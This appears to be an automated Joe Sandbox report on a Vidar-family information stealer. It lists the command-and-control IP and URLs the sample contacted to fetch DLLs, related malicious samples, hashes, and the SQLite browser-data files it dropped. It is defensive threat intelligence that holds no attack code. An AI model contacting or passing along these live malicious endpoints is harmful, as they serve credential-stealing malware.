https://162.55.53.18:9000/vcruntime140.dlle	RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/sqlt.dllB	RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000al	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/ZG	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000tel	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BAEHIE.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
https://162.55.53.18:9000/nss3.dlloft	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp, GDBFHD.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://162.55.53.18:9000ming	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe	RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	BAEHIE.3.dr	false	URL Reputation: safe	unknown
https://162.55.53.18:9000/vcruntime140.dll	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	BAEHIE.3.dr	false	URL Reputation: safe	unknown
https://162.55.53.18:9000/Zm	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000nbfoldnt-Disposition:	RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/$	RegAsm.exe, 00000003.00000002.2942794241.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/vcruntime140.dllA	RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/freebl3.dll	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/cG4	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/vcruntime140.dllppet	RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/nss3.dllJ	RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000	RegAsm.exe, 00000003.00000002.2942656368.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/softokn3.dll2	RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:90001234567890hrome	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/nss3.dll	RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/4	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18/	RegAsm.exe, 00000003.00000002.2942794241.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	GDBFHD.3.dr	false	Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/freebl3.dll~	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/mozglue.dll	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BAEHIE.3.dr	false	URL Reputation: safe	unknown
https://162.55.53.18:9000/.53.18:9000/	RegAsm.exe, 00000003.00000002.2942919191.00000000010BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000tacrosoft	RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.55.53.18	unknown	United States		35893	ACPCA	false
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1459509
Start date and time:	2024-06-19 14:39:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/15@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 65 Number of non-executed functions: 240
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 95.101.54.203, 2.16.202.128, 95.101.54.194, 95.101.54.130, 2.16.202.121, 95.101.54.209, 95.101.54.144, 95.101.54.139, 95.101.54.202, 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:40:07	API Interceptor	1x Sleep call for process: RegAsm.exe modified
08:40:13	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.55.53.18	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	Set-up.exe	Get hash	malicious	Amadey, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Vidar	Browse
149.154.167.99	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	KeyboardRGB.exe	Get hash	malicious	Unknown	Browse	t.me/cinoshibot
	file.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Set-up.exe	Get hash	malicious	Amadey, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://web.telagirem.top/	Get hash	malicious	Unknown	Browse	149.154.167.99
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	http://account.midtrans.com.id.ryo.biz.id/	Get hash	malicious	Unknown	Browse	149.154.167.99
	rRFQ_TSL104_20221024_pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	win6.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse	149.154.167.220
	win5.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse	149.154.167.220
	uKzQIWsGdo.exe	Get hash	malicious	Nightingale Stealer	Browse	149.154.167.220
	KJuctcVQbe.exe	Get hash	malicious	Nightingale Stealer	Browse	149.154.167.220
	CMoW3VhY2s.exe	Get hash	malicious	Nightingale Stealer	Browse	149.154.167.220
	Kf1Rr6jArf.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
ACPCA	file.exe	Get hash	malicious	Vidar	Browse	162.55.53.18
	file.exe	Get hash	malicious	Vidar	Browse	162.55.53.18
	file.exe	Get hash	malicious	Vidar	Browse	162.55.53.18
	Set-up.exe	Get hash	malicious	Amadey, Vidar, Xmrig	Browse	162.55.53.18
	TKHA-A88163341B.bat.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	ORDER TKHA-A88163341B.bat.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	file.exe	Get hash	malicious	Vidar	Browse	162.55.53.18
	aspnet80.exe	Get hash	malicious	Unknown	Browse	162.55.9.25
	aspweb.exe	Get hash	malicious	Sality	Browse	162.55.9.25
	aspweb88.exe	Get hash	malicious	Unknown	Browse	162.55.9.25

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	REQUEST FOR QUOTATION.vbs	Get hash	malicious	Unknown	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Siggen19.3578.32465.8356.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Siggen19.3578.32465.8356.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Encoder.37681.30560.15421.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Encoder.37681.30560.15421.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	FA46969-OVERSEAS 2024.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.99
	TransferNotice_Technoglass_SA_P240408-6K27VGO.js	Get hash	malicious	Unknown	Browse	149.154.167.99
	PDFTool-v3.2.1233.0_49807419.msi	Get hash	malicious	Unknown	Browse	149.154.167.99
	SCAN00381638.SCR.exe	Get hash	malicious	GuLoader, Remcos	Browse	149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	Setup.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win64.Malware-gen.16465.8601.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	qiHXXzgR6f.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\ProgramData\ECGDBFCBKFID\AEBGHD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGDBFCBKFID\BAEHIE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGDBFCBKFID\CBKFBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGDBFCBKFID\DBGHJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGDBFCBKFID\DGHIDH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	modified
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGDBFCBKFID\GDBFHD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGDBFCBKFID\KKEHDB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_9fe2b44b45cabaf5e9b80eb2becdba8923fcbda_d2f759d2_2d8cec74-354d-460a-95ad-bf7884ef09de\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7085213233949067
Encrypted:	false
SSDEEP:	192:M7JhBl4vVPl+0p4iZI3jXqzuiFuZ24IO8TVB:y3oVNlp4iKj6zuiFuY4IO8X
MD5:	A33DBE13115559E3B20FE7A91AB745E5
SHA1:	E3561DBB2B9DC413FD262CE495EAFD8FCB066606
SHA-256:	58CF440D304337042E25AEEA912BDBB986A90BDD6EBB9DE27F4C1DE487EF7B36
SHA-512:	3431CCD9A3347E16458FE3333F769664662C800D9E090BEA3278A11CC8DA4D3D2618E2BF9A56E5935FDA4CAA39513E814485593092598592EDDF4A664D7FBAA6
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.2.7.4.3.9.9.4.8.9.4.1.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.2.7.4.3.9.9.7.8.6.2.7.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.8.c.e.c.7.4.-.3.5.4.d.-.4.6.0.a.-.9.5.a.d.-.b.f.7.8.8.4.e.f.0.9.d.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.3.2.b.9.b.c.-.a.5.b.1.-.4.9.4.e.-.9.2.8.5.-.6.f.5.2.2.8.a.3.d.a.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.4.-.0.0.0.1.-.0.0.1.4.-.e.c.7.2.-.d.1.c.b.4.5.c.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.3.f.5.3.0.4.8.7.2.f.f.4.b.7.9.5.c.d.e.4.8.9.1.4.f.a.4.d.8.1.7.6.8.a.b.b.a.5.d.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCA4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jun 19 12:39:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	43270
Entropy (8bit):	1.8018423576157767
Encrypted:	false
SSDEEP:	192:KDVZHTdMLtO/n4s+kTyBTq7vnI1s/hbM9RcMJP:IVB5M8wtkEOznI1ehbM1
MD5:	AD261D87896F54820D9B230CEDCFA287
SHA1:	77F3D1A51A187415703A74B03C22FF9918E07679
SHA-256:	B9336CF50D5C97087EBBE3D7574DDF397BE47A2E3B1BD53374B8B942765BBAC8
SHA-512:	9EAFE33D3AA361BEEBF554323CE25FBE6DC6C1BC763B88C3771333D7C58DB356F3DEFA6A1DC29BB06BAC505FC18017DA2AAB9DC5306AF5C08F00FB00177078F1
Malicious:	false
Preview:	MDMP..a..... .........rf........................0...........$...Z!..........T.......8...........T.......................................................................................................................eJ..............GenuineIntel............T.............rf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD31.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.695451458569435
Encrypted:	false
SSDEEP:	192:R6l7wVeJnCJ6O76Y9eSU9ngmfBOJJQpr189bVHHsfrHHm:R6lXJk6q6YkSU9ngmf0JJXVHMfTG
MD5:	A73CA148A343A6488103EB6DA5B0B24F
SHA1:	F5BF5D4ABC240C01AF4E83FF7C9C7018C321824B
SHA-256:	808EE5142C537E69CA2B0DF54D1252ADC7903D629BCF5702827C0BA617FE97AB
SHA-512:	147F8D4901E3958A52C597FD383AB3BFBE4078865FA5A42931F19456C9D4CBFF5FAD8BAF9E9CC242D057BFE3542FE900172D29F636C3345C021577AA517D5923
Malicious:	false
